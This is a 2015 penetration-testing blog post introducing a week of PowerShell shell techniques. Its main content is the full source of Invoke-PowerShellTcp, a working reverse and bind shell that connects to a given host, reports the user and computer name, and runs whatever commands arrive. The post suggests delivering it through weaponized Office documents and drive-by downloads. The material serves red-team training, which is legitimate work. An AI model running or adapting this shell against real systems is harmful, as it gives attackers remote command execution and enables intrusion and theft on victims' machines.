Week of PowerShell Shells – Announcement and Day 1

Week of PowerShell Shells – Announcement and Day 1

PowerShell as an essential tool for Penetration Testers and Red Teamers needs no introduction. Its tight integration with Windows operating system allows us to do a variety of interesting stuff which other PowerShell hackers and I have blogged and coded over time. Still, during my talks and trainings I see both attackers and defenders unaware of what PowerShell is capable of and how it can make their life easy. I have also met infosec folks who were dismissive of PowerShell just because it comes from Microsoft. To generate awareness and spread the goodness of PowerShell in the infosec community, I am glad to announce a Week of PowerShell shells.
On each day of the current week, from 11th May to 15th May 2015, I will publish/discuss a blog post and accompanying open source tools for getting interactive PowerShell on a target using different methods, techniques and protocols.

Day 1 – Interactive PowerShell shells over TCP
Day 2 – Interactive PowerShell shells over UDP (Click Here)
Day 3 – Interactive PowerShell shells over HTTP/HTTPS (Click Here)
Day 4 – Interactive PowerShell shells with WMI (Click Here)
Day 5 – Interactive PowerShell shells over ICMP and DNS (Click Here)

Without further ado, lets get started with Day 1.

Day 1 – Interactive PowerShell shells over TCP

Lets start with a reverse shell. It is based on this awesome post at Nettitude by Ben Turner (@benpturner) and Dave Hardy (@davehardy20). Using the scripts with metasploit is well documented in that article. After removing some code and changing few things, I give you Invoke-PowerShellTcp. This script is capable of providing a reverse as well as a bind interactive PowerShell. The current source code (without the help documentation ) looks like this:
 function Invoke-PowerShellTcp 
{ 
 
 [CmdletBinding(DefaultParameterSetName="reverse")] Param(

 [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
 [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
 [String]
 $IPAddress,

 [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
 [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
 [Int]
 $Port,

 [Parameter(ParameterSetName="reverse")]
 [Switch]
 $Reverse,

 [Parameter(ParameterSetName="bind")]
 [Switch]
 $Bind

 )

 #Connect back if the reverse switch is used.
 if ($Reverse)
 {
 $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)
 }

 #Bind to the provided port if Bind switch is used.
 if ($Bind)
 {
 $listener = [System.Net.Sockets.TcpListener]$Port
 $listener.start() 
 $client = $listener.AcceptTcpClient()
 } 

 $stream = $client.GetStream()
 [byte[]]$bytes = 0..255|%{0}

 #Send back current username and computername
 $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
 $stream.Write($sendbytes,0,$sendbytes.Length)

 #Show an interactive PowerShell prompt
 $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
 $stream.Write($sendbytes,0,$sendbytes.Length)

 while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
 {
 $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
 $data = $EncodedText.GetString($bytes,0, $i)
 
 #Execute the command on the target.
 $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )

 $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
 $x = ($error[0] | Out-String)
 $error.clear()
 $sendback2 = $sendback2 + $x

 #Return the results
 $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
 $stream.Write($sendbyte,0,$sendbyte.Length)
 $stream.Flush() 
 }
 $client.Close()
 $listener.Stop()
}
It could be found in the Shells directory of Nishanghttps://github.com/samratashok/nishang/tree/master/Shells

A screenshot of it in action. A listener is running on Kali linux:

A listener could be set up on a Windows machine as well. Lets use powercat (https://github.com/besimorhino/powercat) as a listener:

Using Invoke-PowerShellTcp as a bind shell:

The ability to have an interactive PowerShell helps us in many situations. One good example would be my previous blog post about Dumping users passwords in plaintext for Windows 8.1 and Server 2012. In that case, it was not possible to achieve the results without an interactive PowerShell.

Note that we can use powercat as well.

Choose whatever you like depending on the scenario at hand.

If you see the source code of Invoke-PowerShellTcp, it is really small and therefore can be used with various attack techniques like Weaponized MS Office documents, Human Interface Devices (seeKautilya), Drive by downloads, DNS TXT records etc. where a shorter script is desirable. In fact, it could further be shortened if we remove some error handling and fancy user input. I give you Invoke-PowerShellTcpOneLine.
 01.JPG

Further shortened version which does not show output and could fit in two tweets:

 00.JPG

A quick video shows how Invoke-PowerShellTcp could be used with a weaponized MS Word document:

If you enjoyed the post and want to learn more and/or want to support my research and work, join me for a two days training “PowerShell for Penetration Testers” at:
NolaCon, New Orleans (June 10-11th)https://nolacon.com/powershell-for-penetration-testers/

Shakacon, Honolulu (July 6-7th)http://shakacon.org/

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s